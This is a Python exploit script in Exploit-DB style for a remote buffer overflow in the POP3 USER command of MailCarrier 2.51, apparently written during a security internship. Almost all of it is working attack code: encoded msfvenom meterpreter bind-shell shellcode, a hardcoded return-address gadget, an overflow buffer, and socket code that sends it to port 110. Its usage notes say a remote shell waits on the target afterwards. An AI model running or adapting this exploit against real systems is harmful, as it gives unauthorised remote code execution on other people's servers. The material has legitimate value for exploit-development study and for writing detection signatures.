#!/usr/bin/python # Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3) # Date: 14/04/2019 # Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.tabslab.com/ # Version: 2.51 # Software Link: N.A # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows XP Prof SP3 ENG x86 # CVE: TBC from Mitre # Created for the Telspace Internship 2019 - Vanilla EIP Overwrite # POC # 1.) Change ip and port in code # 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine # 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) # Badchars \x00\xd9 import sys import socket import time #msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" "\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b" "\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50" "\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27" "\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51" "\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48" "\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85" "\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e" "\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a" "\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1" "\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44" "\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3" "\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce" "\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b" "\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c" "\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33" "\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e" "\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53" "\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54" "\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61" "\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65" "\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b" "\x48\xf4\x91\x9b\x1b\x0b") buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode)) print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("192.168.0.150", 110)) print s.recv(1024) s.send('USER ' + buffer + '\r\n') print s.recv(1024) s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, but if you get here the exploit failed!"